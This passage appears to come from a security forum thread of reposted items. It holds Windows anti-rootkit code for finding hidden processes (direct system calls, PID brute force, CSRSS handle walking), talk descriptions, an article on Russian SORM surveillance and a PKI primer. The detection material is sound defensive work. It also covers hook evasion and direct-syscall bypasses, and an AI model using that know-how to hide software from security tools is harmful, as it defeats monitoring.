        __asm
        {
            mov eax, 0x105
            call SystemCall_WIN7
            ret 0x10
SystemCall_WIN7:
            mov edx, esp
            sysenter
        }
    }
}

This technique can discover any userland rootkit process, and the only way for a rootkit process to defeat it is to move into the kernel. However, due to the low-level implementation, there is a slight risk in using this method in production code.

HPD using PIDB (Process ID Bruteforce) method TOP

This method was first used by BlackLight, and it turned out to be very effective yet simple.
Here, it enumerates process IDs from 0 to 0x41DC and checks whether each process exists by calling the OpenProcess function. This list of discovered processes is then compared with the normal process list obtained using standard enumeration functions (such as Process32First and EnumProcesses). During testing, it was found that some process IDs on server machines exceeded the magic number 0x41DC. So, in order to be effective, the magic number is doubled to cover all possible running processes on the latest operating systems. Here is the sample code that implements the PIDB method:

for(int i=0; i < 0x83B8; i+=4)
{
    // These are the system idle and system processes
    if( i == 0 || i == 4 )
    {
        continue;
    }

    hprocess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, i);

    if( hprocess == NULL )
    {
        if( GetLastError() != ERROR_INVALID_PARAMETER )
        {
            // If the error code is anything other than
            // ERROR_INVALID_PARAMETER, this process exists
            // but we are not able to open it.
            // Check if this process was already discovered
            // using standard API functions.
            if( IsHiddenProcess(i) )
            {
                printf("\n Hidden process found %d", i);
            }
        }
        continue;
    }

    dwExitCode = 0;
    GetExitCodeProcess(hprocess, &dwExitCode);

    // Check if this is an active process...
    // only an active process will return the exit code
    // STILL_ACTIVE (numerically equal to ERROR_NO_MORE_ITEMS)
    if( dwExitCode == ERROR_NO_MORE_ITEMS )
    {
        // Check if this process was already discovered
        if( IsHiddenProcess(i) )
        {
            printf("\n Hidden process found %d", i);
        }
    }

    CloseHandle(hprocess);
}

Though this is a very effective method, a rootkit can easily defeat it by hooking OpenProcess, or its native version NtOpenProcess, and returning NULL with the error code set to ERROR_INVALID_PARAMETER. To defend against such tricks, anti-rootkit software can call NtOpenProcess using the direct system call method shown in "HPD using Direct NT System Call Implementation" above.
HPD with CSRSS Process Handle Enumeration TOP

Any running Windows process holds a lot of open handles related to processes, threads, named objects, files, ports, registry keys, etc., and these can be used to detect hidden processes. An effective way to enumerate handles is to use the native API function NtQuerySystemInformation with SystemHandleInformation as the first parameter. It lists the handles from all running processes in the system. For each enumerated handle, it provides information such as the handle value, the handle type, and the process ID of the owning process. Hence, by enumerating all the handles and then using the associated process IDs, one can detect any hidden processes that are not revealed through the standard API functions.

There is one interesting system process, CSRSS.EXE, which holds handles to all running processes. So instead of going through all the different handles, one can just walk through the process handles of the CSRSS.EXE process. Interestingly, this method can detect not only userland hidden processes but also some rootkit processes that use kernel-land techniques without taking care to hide their process handles within the CSRSS.EXE process. Here is a code snippet that demonstrates this method:

PVOID bufHandleTable = malloc(dwSize);
status = NtQuerySystemInformation(SystemHandleInformation, bufHandleTable, dwSize, 0);

SYSTEM_HANDLE_INFORMATION *HandleInfo = (SYSTEM_HANDLE_INFORMATION *) bufHandleTable;

// Process handles within CSRSS will not include handles to the
// following processes: system idle process, system process,
// smss.exe, csrss.exe.
for(int i=0; i < HandleInfo->NumberOfHandles; i++)
{
    int pid = HandleInfo->Handles[i].UniqueProcessId;

    // For XP & 2K3         : HANDLE_TYPE_PROCESS = 0x5
    // For Vista & Longhorn : HANDLE_TYPE_PROCESS = 0x6
    if( HandleInfo->Handles[i].ObjectTypeIndex == HANDLE_TYPE_PROCESS )
    {
        // Check if this process ID is that of the CSRSS.EXE process.
        if( IsCSRSSProcess(pid) )
        {
            hprocess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, pid);

            if( hprocess )
            {
                if( DuplicateHandle(hprocess,
                        (HANDLE)HandleInfo->Handles[i].Handle,
                        GetCurrentProcess(),
                        &tprocess,
                        PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                        FALSE,
                        0) )
                {
                    targetPid = GetProcessId(tprocess);

                    // Check if this is a hidden process
                    if( IsHiddenProcess(targetPid) )
                    {
                        printf("\n Found hidden process %d", targetPid);
                    }
                }
            } // End of if( hprocess )
        } // End of if( IsCSRSSProcess(pid) )
    } // End of if
} // End of for-loop

Since CSRSS.EXE is not the first process started when Windows boots, it does not contain handles to processes started before it: the system idle process (pid 0), the system process (pid 4), smss.exe, and CSRSS.EXE itself. On Windows Vista, more than one CSRSS.EXE process may be running when multiple users are logged in. The same situation arises on XP when more than one user is operating through the 'Switch User' mechanism. In such cases, one has to check whether the enumerated process handle belongs to any of these CSRSS process IDs. The function IsCSRSSProcess() above does exactly that, by comparing the discovered process ID against the list of all running CSRSS.EXE processes.

Since most rootkits are aware of this technique, another approach is to enumerate all thread handles within the CSRSS process instead of process handles. The CSRSS process holds not only process handles but also thread handles for every running process. Once a thread handle is known, one can duplicate it and then use the GetProcessIdOfThread function to get the process ID associated with that thread.

Though any rootkit process can try to defeat this technique by hooking the NtQuerySystemInformation or NtOpenProcess functions, such hooks can themselves be bypassed by using the direct implementation of these native API functions described in "HPD using Direct NT System Call Implementation" above.
Other Methods of Detecting Hidden Processes TOP

Several other userland methods exist to detect hidden rootkit processes, but they are not as effective as the ones described above. However, they can be used on a need basis, often to target a specific rootkit. One such method is to enumerate all the open windows created by processes in the system using the EnumWindows API function, and then call the GetWindowThreadProcessId function to get the process ID associated with each window. Here is the sample code that does this:

// Set up the callback function to enumerate through windows
EnumWindows(EnumWindowsProc, NULL);

// This is the callback function invoked for each window
BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
    DWORD procId;

    GetWindowThreadProcessId(hwnd, &procId);

    if( IsHiddenProcess(procId) )
    {
        printf("Found hidden process %d", procId);
    }

    return TRUE; // continue the enumeration
}

Several other ways to detect hidden processes in user land exist, and new ones are being discovered every day. Though these detection techniques can easily be defeated from kernel land, they offer a simple and less risky mechanism for uncovering userland rootkits.

References TOP

1. http://rootkit.com/newsread.php?newsid=434
2. CsrWalker - processes detection from User Mode - Sysinternals Forums - Page 1

Source: Userland - Hidden Process Detection - RootkitAnalytics.com
  11. Writing Buffer Overflows By Haxor Magee Description: Vulnerable App - Snort <= 1.9.1 - Remote Root Exploit (p7snort191.sh)... (download it at the top) Immunity Debugger - http://debugger.immunityinc.com/regis... Perl for Windows - ActivePerl is Perl for Windows, Mac, Linux, AIX, HP-UX & Solaris | ActiveState... Use Windows XP 32-bit for testing! Source: Writing Buffer Overflows By Haxor Magee
  12. Ccc Camp 11 Black Ops Of Tcp/Ip 2011 Description: Black Ops of TCP/IP 2011 Remember when networks represented interesting targets, when TCP/IP was itself a vector for messiness, when packet crafting was a required skill? In this thoroughly retro talk, we're going to play with systems the old fashioned way, cobbling together various interesting behaviors with the last few shreds of what low level networking has to offer. Here are a few things to expect: * IPv4 and IPv6 Fragmentation Attacks, Eight Years In The Making * TCP Sequence Number Attacks In Modern Stacks * IP TTLs: Not Actually Expired * Inverse Bug Hunting: More Things Found On The Open Net * Rebinding Attacks Against Enterprise Infrastructure * BitCoin: Network Manipulation for Fun And (Literal) Profit * The Net Neutrality Transparency Engine DNS might show up, and applications are going to be poked at. But this will be an old style networking talk, through and through. For more information, please visit: Camp 2011 Source: Ccc Camp 11 Black Ops Of Tcp/Ip 2011
  13. Nick Walker: Android Security Assessments 101 Description: Following a warm welcome to Securi-Tay 2 by Paul Dalton (chair of the organising committee), Nick Walker (@tel0seh) discussed the security implications of Android applications and demonstrated exploiting an Android device using the Mercury 2.0 framework as Securi-Tay 2's opening and keynote speaker. Securi-Tay 2 took place on 16th January 2013 at the University of Abertay Dundee. For more information, please visit: http://www.Securi-Tay.co.uk Abertay Ethical Hacking Society: Ethicalhackingsociety.com Abstract: Android has firmly established its place as a contender in the smartphone market in recent years, and the number of applications available for the operating system has increased drastically. Our phones live in our pockets and contain vast amounts of information about ourselves, as we rely on them for everything from communication to purchases and banking. The security of these applications is obviously imperative, yet the technology and its security are widely misunderstood. This talk will explore the security implications of developing Android applications, with a walkthrough of a methodology used by security consultants to identify vulnerabilities (featuring Mercury 2.0). For more information, please visit: Mailing List Signup - Securi-Tay Information Security Conference https://www.youtube.com/channel/UC8Z30xDABAC_KgVFR9Nt75A?&channel=AbertayHackers Source: Nick Walker: Android Security Assessments 101
  14. Ccc Camp 11 Ios Application Security Description: iOS application security A look at the security of 3rd party iOS applications Over the last few years there has been a significant amount of iPhone and iPad application development going on. Although based on Mac OS X, its development APIs are new and very specific to the iPhone and iPad. In this presentation, Ilja van Sprundel, Principal Security Consultant at IOActive, will discuss lessons learned from auditing iPhone and iPad applications over the last year. It will cover the use of specific APIs, why some of them aren't granular enough, and why they might expose way too much attack surface. The talk will cover SSL, XML, URL handling, UIWebViews and more. Furthermore, it will also cover what apps are allowed to do inside their sandbox once an application has been hacked. For more information, please visit: Camp 2011 Source: Ccc Camp 11 Ios Application Security
  15. Russia and Internet Freedom The Russian government is increasing its pressure on social media. Many experts maintain that the population is suffering serious online censorship, and analysts have noted a surge in the use of anonymous web-surfing software like Tor. According to data published on the Tor Metrics Portal, the number of directly connecting users from Russia rose from 80,000 in June to more than 200,000 in the last week. It has been estimated that Russia had 68 million Internet users last winter (59% of the adult population), and although 200,000 users represent a small fraction of the overall Russian online population, the data reveal a concerning situation in which Russian netizens fear government monitoring of their online activities. In May, the State Duma discussed a copyright protection bill, still pending, that proposes extrajudicial blacklisting of websites suspected of hosting pirated content. Experts and Internet freedom activists are accusing the Russian government of working to introduce online censorship in the country. "They are enemies of freedom of information … But all they will achieve is an increase in the public's computer literacy," said Anton Nosik, a popular Russian blogger. Censorship in Russia could affect the most popular social media sites, impacting millions of Internet users. It's clear that the Kremlin fears the possibility that foreign governments could destabilize the country, or some local areas, with PSYOPs. Figure – Tor Metrics – Direct users from Russia Below is the timeline of Internet regulation activities in Russia published by The Moscow Times: • 2012, November: Extrajudicial blacklisting allowed for websites promoting child pornography, suicide and illegal drugs. Data from Rublacklist.net indicates 97 percent of websites on the list committed no offense and were banned as the collateral damage of imperfect blacklisting methods.
• 2013, July: Extrajudicial blacklisting expanded to websites accused of hosting possibly pirated films. The number of Russian Tor users between mid-August and mid-September 2013 rose from 25,000 to 150,000. Figure – Tor Metrics – Direct users by country (last 12 months) • 2013, October: The Pirate Party of Russia, which campaigns for freedom of information, is denied official registration for the third time over its title, which, the government claimed, promotes "robbery on the high seas." • 2014, February: Extrajudicial blacklisting expanded to websites accused of promoting riots as well as extremism, a charge frequently applied to critics of the government. • 2014, June: Bloggers with a daily readership upward of 3,000 users are obliged by law to de-anonymize and register with the state. On January 15th, 2013, Vladimir Putin approved a decree that assigns full powers to the Federal Security Service (FSB) to "create a state system for the detection, prevention and liquidation of the effects of computer attacks on the information resources of the Russian Federation." Neither the FSB nor the Kremlin has provided further details on the government program to reinforce the security of cyberspace. Russian authorities are working on the definition of an automated defense system able to mitigate incoming cyber attacks against Russian web assets both inside the country and abroad. In November 2012, the Russian government deployed a system able to monitor the Internet activities of millions of citizens and to ban content not approved by the central government. The project will use new, complex Internet-monitoring technologies to implement the "Single Register", which is able to spy on the Internet activities of Russians, officially to prevent online pedophilia.
The Register is populated with censorship requests coming from the Agency for the Supervision of Information Technology, Communications and Mass Media (the Roskomnadzor), which applies court decisions and executes orders of three government agencies: the Interior Ministry, the Federal Antidrug Agency, and the Federal Service for the Supervision of Consumer Rights and Public Welfare. In July 2013, Vladimir Putin signed a law that covers not only child pornography but also online content expressing dissent against the government. The agency has established complete control over Internet activities, exactly like many other countries, and it has the power to require ISPs to block the flagged content within 24 hours, according to media reports. But how does the Register operate? According to an article published in Wired, the government in Moscow has deployed a system that implements DPI (deep packet inspection) technology on a nationwide scale, despite there being no official mention of it in the signed law. DPI is the most advanced and intrusive category of inspection tool, as it is able to analyze every single packet in the traffic, filtering for particular services or content. Many other governments around the world have adopted it, including Iran and China, the latter using it to implement its Great Firewall project. The following is a passage from the Ministry of Communications acknowledging the presence of deep packet inspection technology: "At the end of August, under the chairmanship of Communications minister Nikolai Nikiforov, a working group was held, drawing representatives of Google, SUP Media (the owner of the Livejournal social network), and of all the other big hitters. They discussed how to ensure that the [filtering] mechanism — they used the concrete example of YouTube — how to block a specific video, without blocking YouTube as a whole.
And they reached the conclusion that pleased them all," Ilya Ponomarev, a member of the State Duma and an ardent supporter of the law, declared. Are we talking about DPI technology? we asked. "Yes, precisely." Eric King, head of research at Privacy International, declared: "No Western democracy has yet implemented a dragnet black-box DPI surveillance system due to the crushing effect it would have on free speech and privacy." "DPI allows the state to peer into everyone's internet traffic and read, copy or even modify emails and web pages: We now know that such techniques were deployed in pre-revolutionary Tunisia. It can also compromise critical circumvention tools, tools that help citizens evade authoritarian internet controls in countries like Iran and China." The system is codenamed SORM ("System for Operative Investigative Activities"). It can be used for Internet surveillance because, according to a Russian law passed in 1995, the FSB (state security organization) may monitor telephone and Internet communications. The SORM-1 system, established in 1996 to monitor telephone communications, was superseded by SORM-2 in July 1998 to monitor the Internet. Internet Service Providers (ISPs) must install a special device on their servers to allow the FSB to track all credit card transactions, e-mail messages and web use. The cost of the SORM equipment at the time the regulation was introduced was nearly USD 25,000, a price so high that many small and independent ISPs decided to shut down. There was also the singular case of a small regional ISP in Volgograd, Bayard-Slaviya Communications, which tried to refuse the installation of the appliance required by the new law. As expected, the Ministry of Communications revoked the provider's license; however, when the ISP brought the question to court, the ministry renewed its license.
Events such as the Arab Spring and the parallel growth of political activism have alerted the Russian government to the dangers of the free circulation of information on social media. The imperative is to monitor everything to avoid surprises and to keep Western eyes far from "internal questions". First Deputy Director of the FSB Sergei Smirnov declared: "New technologies are used by Western secret services to create and maintain a level of continual tension in society with serious intentions extending even to regime change…. Our elections, especially the presidential election and the situation in the preceding period, revealed the potential of the blogosphere." Smirnov stated that it was essential to develop ways of reacting adequately to the use of such technologies and confessed openly that "this has not yet happened." There is a contradiction in the Russian approach: for years the government declared itself opposed to such invasive Internet control, raising critical concerns about Chinese Internet censorship. According to declarations from Russian intelligence, DPI technologies were introduced long ago. In 2004, the security department acquired a Transtelecom system for its internal network. Many companies sell DPI technology in Russia, such as the Canadian Sandvine, the Israeli Allot, the American Cisco and Procera, and the Chinese Huawei. Since 2013, all mobile operators in Russia have deployed DPI: Procera was installed at VimpelCom, Huawei's DPI solutions are in use at Megafon, and MTS bought Cisco DPI technology. The mobile operators justified the DPI acquisitions as a way to manage bandwidth saturated by the heavy use of peer-to-peer protocols; DPI also allows them to suppress any undesired services, such as torrents. Russian ISPs have likewise installed DPI appliances at their own expense, as required by law. Smaller operators have also looked for cheap solutions on the second-hand market for Cisco DPI appliances.
The situation is really worrying, in my opinion. The Russian government has demonstrated zero tolerance for any kind of opposition; in Russia, expressing any idea against Putin's government is genuinely dangerous. The Russian government is evaluating the possibility of regulating popular media like Facebook and Twitter in the country, and something quite similar for news aggregators, including Google and Yandex. If you are interested in further data on the Internet control operated by Russia, take a look at the information collected by the OpenNet Initiative, a project that collects data on worldwide Internet filtering. The organization confirms that Russia is implementing selective filtering, mainly on political and social issues. Figure – OpenNet Project – Data on Russian Internet Monitoring System of Operative-Investigative Measures (SORM) The System of Operative-Investigative Measures, also known as SORM, is the Russian system for the lawful interception of all electronic communication. The system has been mentioned in numerous documents. In early 2013, the Bureau of Diplomatic Security at the U.S. State Department issued an official alert for US citizens planning to attend the Winter Olympics in Sochi, Russia. Figure – Russian Lawful Interception The U.S. warning ends with a list of "Travel Cyber Security Best Practices," which, apart from the new technology, resembles the briefing instructions for a Cold War-era spy: "Consider traveling with "clean" electronic devices—if you do not need the device, do not take it. Otherwise, essential devices should have all personal identifying information and sensitive files removed or 'sanitized.' Devices with wireless connection capabilities should have the Wi-Fi turned off at all times. Do not check business or personal electronic devices with your luggage at the airport. … Do not connect to local ISPs at cafes, coffee shops, hotels, airports, or other local venues.
… Change all your passwords before and after your trip. … Be sure to remove the battery from your Smartphone when not in use. Technology is commercially available that can geo-track your location and activate the microphone on your phone. Assume any electronic device you take can be exploited. … If you must utilize a phone during travel consider using a 'burn phone' that uses a SIM card purchased locally with cash. Sanitize sensitive conversations as necessary," states the US warning. The warning is clear and gives the reader an idea of the powerful capabilities of Russian intelligence; US authorities even advise Americans returning from Sochi to destroy their mobile devices. Major telecommunications operators and Internet Service Providers are required by law to intercept persons of interest and to provide the collected data to the respective government agencies. The Federal Security Service (FSB) and any other law enforcement or intelligence agency in the country must obtain a court order before intercepting Russian citizens, but, as reported by the World Policy Institute, telecom providers have no right to demand that the intelligence agency show them the warrant. It is curious to note that the FSB required operators and ISPs to physically install the needed SORM hardware, taking on the cost of installation and maintenance themselves, while having no right to access the information it acquires. SORM appliances are distributed across the whole country and are connected via a protected underground network to the local FSB headquarters. The SORM program is an ongoing project started by the Soviet KGB in the mid-1980s; successive technological evolutions have produced continuous updates to the lawful interception system. The Russian government introduced the surveillance system to improve the investigation of crimes and the prevention of terrorism.
The Law on Systems for Operational Investigation Activity (SORM) of 1995 authorized the FSB to monitor any telecommunications transmission. In 1999, an amendment to SORM, SORM-II, extended its reach to Internet traffic. SORM-II is still operating and, since 2008, thanks to an order signed by the Minister of Communications Leonid Reiman, it can also be used to monitor users' Internet activities. SORM-II obliges ISPs to provide the FSB with statistics on all Internet traffic that passes through their servers. This is achieved by installing SORM appliances on their servers that route all transmissions in real time through the FSB's monitoring platforms. In this way, the FSB is able to track every user's transactions, e-mail communications, and online browsing. Many sources on the web report that SORM-3 is able to collect information from all forms of communication and to analyze the huge amount of data collected. The worrying aspect of the story is that, according to Russia's Supreme Court, the number of intercepted telephone conversations and email messages has doubled in six years. "Providers must also provide the FSB with information on users' names, telephone numbers, e-mail addresses, one or more IP addresses, key words, user identification numbers, and users' ICQ number (instant messaging client), among others. Under Putin, Minister of Communications Reiman entered an order stating that the FSB officials shall not provide information to the ISPs either on users who are being investigated or regarding the decision on the grounds of which such investigations are made. Consequently, this Order offered a 'carte blanche' to the Special Services to police the activities of Internet users without supplying any further information to the provider or any other interested party," states the report from the OpenNet Initiative.
Social media as a potential threat Fearing uprisings like the Arab Spring, the Russian FSB has increased its monitoring of social media platforms; Russian intelligence is well aware of the potential effect of PSYOPs. The revolutions in the Middle East and the role played by social networks were the main topics of discussion at an informal summit of the Collective Security Treaty Organization (CSTO), a regional military alliance led by Moscow, in August 2011. In December 2011, a wind of protest was blowing through Moscow, prompted by Putin's campaign to return to the presidency, and social networks assumed a critical role in the diffusion of information discrediting Putin and his collaborators. The FSB ordered the suppression of the media activity of protest groups; for example, it ordered Pavel Durov, founder of the Russian social network VKontakte, to block the websites of protest groups, but Durov refused. The failure to prevent protests organized on social media led the government to adopt a new platform to monitor social networks and identify participants in online discussions. But SORM isn't the only system available for monitoring activities. The Commonwealth of Independent States (CIS) uses a special analytical search system called "Semantic Archive", designed by the Russian firm Analytic Business Solutions. Semantic Archive's key features are: • Automated collection and processing of information obtained from heterogeneous sources, both internal (file documents, proprietary databases, e-mails) and external (online databases, news media, blogs, forums, social networks). • A single uniform storage for all types of collected documents. • Knowledge extraction, i.e. automatic and semi-automatic extraction of objects, events and relationships from documents. • Maintenance of a knowledge base and collection of dossiers on particular projects, investigations, partners, competitors, clients, etc. • Revealing of hidden or implicit relationships between objects.
• Visual presentation of knowledge in the form of a semantic network. • A variety of reports used to present the results of research. According to this description, Semantic Archive allows the monitoring of any media archive, online source, blog, or social network. It allows the composition of complex queries and also provides a visual representation of the results obtained. Of course, the FSB decided that it also needed the data held on social media servers, and to get it, it obliged the companies providing those web services to open their data to SORM. The operation was successful with the Russian social networks Vkontakte and Odnoklassniki, whose systems are hosted in Russia, but Western social networks, including Twitter and Facebook, excluded this possibility. The Kremlin is attempting to force international social media companies operating on Russian soil to cooperate with the central government in compliance with the national legal framework. In November 2012, the Russian government acquired a system for Internet filtering within the country. It introduced the Single Register, which collects website blacklisting requests from three government agencies: the Roskomnadzor, the Federal Anti-Drug Agency, and the Federal Service for the Supervision of Consumer Rights and Public Welfare. Each request must be served within 24 hours, and hundreds of websites have already been banned from the Russian Internet. The control applied by the Russian authorities is pervasive: every access point to the Internet is controlled, and Internet cafes, libraries and other public places are subject to continuous inspection. During December's International Telecommunications Union (ITU) conference in Dubai, the Russian government proposed its design for a system of Internet monitoring.
The project proposed by Russia aimed to move the management of domain-name and IP-address distribution from the US-based organization ICANN to an international organization such as the ITU, which could be more easily influenced by Moscow. The Russian proposal was not approved: the United States, the United Kingdom, Western European countries, Australia and Canada didn't vote for it. The majority of Russian Internet users are connected by broadband (40 percent), followed by dial-up (27 percent) and ADSL (23 percent), according to data provided by the OpenNet Initiative. Nearly 89 percent of the Russian telecommunications infrastructure now belongs to SvyazInvest, which is controlled by the Russian government through the Federal Property Agency. Looking at regional ISPs, the principal ones (e.g. Central Telecommunication Company, North-West Telecom, VolgaTelecom, Southern Telecom, Uralsvyazinform, Sibirtelecom, Dalsvyaz, and Central Telegraph) are SvyazInvest subsidiaries. SvyazInvest also holds 51 percent of the shares of Rostelecom, the popular telecommunications operator and ISP. The experts at Recorded Future have analyzed the SORM manufacturers with their platform and identified several equipment suppliers from different countries, including Cisco Systems (US), Juniper Networks (US), Huawei (China) and Alcatel-Lucent (France). Further evidence of the extension of the SORM system was observed in the wake of Crimea's occupation by pro-Russian groups and the claimed cyber attacks on Ukrainian telecommunications systems. Control over Ukrainian telecommunication systems was also possible thanks to control of the SORM equipment installed by the Ukrainian government for lawful interception activities. Figure – RecordedFuture Analysis Russian Timeline Figure – RecordedFuture SORM Timeline Several former Soviet states, including Belarus, Kazakhstan, Uzbekistan and Ukraine, have installed SORM devices.
In particular, the system installed in Ukraine is considered the most advanced because it also implements a kill switch for the target's communication channels. In April 2011, the company Iskratel announced its SORM architecture had been tested successfully under the new requirements and approved by the SBU. Sochi Olympic Games Just a few weeks before the Sochi Olympics, NBC News revealed that attendees at the event were being hacked just before arriving in Sochi. Intelligence agencies of all participating governments were worried about the possibility of a terrorist attack or a cyber attack against the organization and its assets. The event represented a great occasion for bad actors, who could benefit from the media attention to run clamorous cyber attacks. The reporter Richard Engel demonstrated the efficiency of the Russian surveillance system with the support of a cyber security expert. They configured two computers to verify how quickly the devices would be attacked when accessing Russian networks. The discovery was predictable: when the reporter and his collaborator went to a cafe to access the network, they were immediately attacked. "Before we even finished our coffee" the bad actors had hit, downloading malware and "stealing my information and giving hackers the option to tap or even record my phone calls … less than 1 minute [for hackers] to pounce, and in less than 24 hours, they had broken into both of my computers," Engel said. As the journalist explained, it was enough to go online to become a victim of the attack. Kaspersky Lab, which was in charge of supporting the Sochi Olympic Committee with computer security, confirmed that every entity is subject to attack. The Russian authorities, through their control of the communication channels, are able to inoculate any kind of malicious code, which could be used to track individuals who accessed public and mobile telecommunications. 
Every single bit transmitted via phone and Internet is analyzed by the Russian System for Operational-Investigative Activities, according to the U.S. State Department’s Overseas Security Advisory. “OSAC constituents traveling to Sochi should be aware that the Russian System for Operational–Investigative Activities (SORM) lawfully enables authorities to monitor, record, analyze, and retain all data that traverses Russian networks. Through SORM technologies, Russian authorities have access to any information transmitted via telephone and Internet networks, including all emails, telephone calls, Internet browsing sessions, text messages, and fax transmissions. By Russian law, all telecommunications companies and Internet Service Providers (ISPs) are required to install SORM devices on their networks. These devices allow for remote access and transmission of information to the Russian Federal Security Service (FSB) offices. Telecommunications providers are denied access to the surveillance devices and, therefore, have no knowledge of any accessed or intercepted communications. “Although the FSB technically requires a court order to intercept communications, there is no requirement to show it to anyone outside the agency. SORM is enabled throughout Russia and is undergoing technological upgrades and modernization. Since 2010, particular attention has been paid to Sochi in preparation for the Olympics. The system in Sochi is capable of capturing telephone (including mobile phone) communications; intercepting Internet (including wireless/Wi-Fi) traffic; and collecting and storing all user information and data (including actual recordings and locations). Deep packet inspection will allow Russian authorities to track users by filtering data for the use of particular words or phrases mentioned in emails, web chats, and on social media.” The Sochi Olympic Games have provided evidence of the complex monitoring machine managed by the Russian Intelligence. 
The reports issued by other intelligence agencies and the information provided by independent journalists point to a powerful structure, comparable to the US one, used for Internet monitoring. Don't forget that the Russian government is also considered one of the most dangerous entities in cyberspace due to its cyber capabilities. Many experts have attributed to the Russians cyber espionage campaigns like SNAKE, which enabled a large-scale espionage operation. Figure – Sochi infrastructure Conclusions The Russian SORM surveillance system is a worrying reality, and analyzing the data presented, some reflections raise serious questions about its final use: The technology used by the Russian government is very advanced. It is a mix of the best surveillance devices provided by the principal foreign suppliers. From a legal perspective, SORM is far more flexible and intrusive than Western surveillance systems. It is enough to add an entry for a subject of interest in the Register to allow monitoring of individuals without a time limit. SORM is deployed in many other former Soviet countries. This could give Russian intelligence an advantage in extending its lawful interception activities. SORM, like any other surveillance system, is considered by governments a necessary instrument to ensure homeland security, but we cannot ignore its abuse, a circumstance that is also very frequent in countries like Russia. I decided to write about SORM because of the numerous questions I receive daily, but it is important to remark that many other countries have deployed similar systems and operate a more aggressive policy against any form of dissent. Unfortunately, in many countries it is not possible to express an opinion contrary to the central government's. Millions of people every day risk their lives for a blog post or for participating in a discussion on social media. 
References Russia deploys a massive surveillance network system - Security Affairs | Security Affairs Russian government wants to strengthen its cyber defense,what's new? - Security Affairs | Security Affairs Anonymous Browser Mass Hit as Russians Seek to Escape Internet Censorship | News | The Moscow Times ITAR-TASS: Economy - Russia wants to replace US computer chips with local processors Sochi visitors Hacked in few minutes to prevent attacks | Security Affairs Russia to Monitor All Communications at Sochi Winter Olympics; SORM System is “PRISM on Steroids” | LeakSource https://www.recordedfuture.com/russia-ukraine-cyber-front/ http://www.europarl.europa.eu/meetdocs/2009_2014/documents/libe/dv/soldatov_presentation_/soldatov_presentation_en.pdf Lawful Interception and SORM | Iskratel In Ex-Soviet States, Russian Spy Tech Still Watches You | Danger Room | WIRED https://www.us-cert.gov/ncas/tips/ST14-001 Russia Moves Toward China-Style Internet Censorship - Businessweek Russia's Surveillance State | World Policy Institute Analytical Business Solutions, Inc. - Semantic Archive PRISM and SORM: Big Brother is watching | RUSSIA | The Moscow News https://www.privacyinternational.org/reports/russia/ii-surveillance-policy By Pierluigi Paganini|July 1st, 2014 Sursa: How Russia Controls the Internet - InfoSec Institute
  16. [h=2]Public Key Infrastructure (PKI) in the Cloud[/h] As the adoption of the various cloud models (i.e. public, private, and hybrid) across industry verticals increases, the cloud buzzword is on a new high. However, customers still have doubts about security and raise a common question: “How can I trust the cloud?” The simplest answer to this question is to “build trust around the cloud,” but how? Well, we have the wonderful concept of Public Key Infrastructure (PKI), which, if planned and implemented properly, can be a good fit for building customers’ trust in a cloud. Before discussing in detail the implementation and challenges of PKI in the cloud, let’s learn or refresh some basics. Each and every security process, layer or piece of software must implement and cover the CIA triad. What is CIA? C-Confidentiality: ensuring that information sent between two parties remains confidential between them only and is not viewed by anyone else. I-Integrity: ensuring that a message in transit maintains its integrity, i.e., its content is not changed. A-Availability: the systems fulfilling requests must be available at all times. Along with these, some important related concepts are described below: Authentication: the process of confirming someone’s identity with supplied parameters like username and password. Authorization: the process of granting a confirmed identity access to a resource based on its permissions. Non-Repudiation: ensuring that the endpoint that sent a message cannot later deny having sent it. [h=2]Public Key Infrastructure (PKI)[/h] To provide security services like confidentiality, authentication, integrity, non-repudiation, etc., PKI is used. PKI is a framework consisting of security policies, communication protocols, procedures, etc. 
to enable secure and trusted communication between different entities both within and outside the organization. PKI is built as a hybrid of symmetric and asymmetric encryption. Let’s discuss this briefly: Symmetric Encryption: A single key is used to encrypt and decrypt the messages sent between two parties. Symmetric encryption is fast, and this type of encryption is effective only when the key is kept absolutely secret between the two parties. But to transmit this secret key over an untrusted network, i.e. the Internet, asymmetric encryption is needed. Asymmetric Encryption: A pair of keys is used to encrypt and decrypt messages. The pair is termed the public and private keys. The private key is kept secret by the owner, and the public key is visible to everyone. Here is how it works: Suppose ‘A’ and ‘B’ want to communicate using asymmetric encryption. ‘A’ encrypts the message with B’s public key so that only ‘B’ can decrypt it with its private key. When replying, ‘B’ encrypts the message with A’s public key so that only ‘A’ can decrypt it using its own private key. Sounds like a perfect solution, doesn’t it? Well, as far as secrecy is concerned it is, but in real-world scenarios asymmetric encryption is pretty slow, as the keys involved are 1024 or 2048 bits long, and after the initial handshake this overhead would still be incurred for every subsequent request. So what to do? In comes the PKI approach, a hybrid of symmetric and asymmetric encryption. Here, the handshake happens over asymmetric encryption to exchange the secret key used for symmetric encryption. Once the secret key is exchanged, the rest of the communication happens over symmetric encryption. In this way, both security and performance are achieved. 
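The hybrid handshake described above can be sketched in a few lines. This is an illustration only, not real cryptography: the "asymmetric" half is textbook RSA with tiny primes and the "symmetric" half is a repeating single-byte XOR, both chosen purely so the slow-once/fast-thereafter shape of the protocol is visible.

```python
# Toy sketch of the hybrid handshake -- illustration only, NOT real crypto
# (textbook RSA with tiny primes, single-byte XOR "cipher").

# --- toy asymmetric key pair (classic textbook RSA example values) ---
p, q = 61, 53
n = p * q                           # public modulus (3233)
e = 17                              # public exponent
d = pow(e, -1, (p - 1) * (q - 1))   # private exponent (2753)

def asym_encrypt(m: int) -> int:
    return pow(m, e, n)             # anyone can do this with the public key

def asym_decrypt(c: int) -> int:
    return pow(c, d, n)             # only the private-key holder can do this

# --- toy symmetric cipher: XOR with a shared key byte (same op both ways) ---
def sym_crypt(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

# Handshake: pick a secret key, send it protected by the peer's public key.
secret_key = 0xA7                          # would be random in practice
handshake_blob = asym_encrypt(secret_key)  # the slow asymmetric step, done once

# Peer recovers the key; all further traffic uses the fast symmetric cipher.
peer_key = asym_decrypt(handshake_blob)
ciphertext = sym_crypt(b"hello cloud", peer_key)
plaintext = sym_crypt(ciphertext, secret_key)
print(plaintext)  # b'hello cloud'
```

Real deployments replace the toy pieces with RSA/ECDH key exchange and a cipher like AES, but the division of labor is the same: asymmetric once for the key, symmetric for the bulk data.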
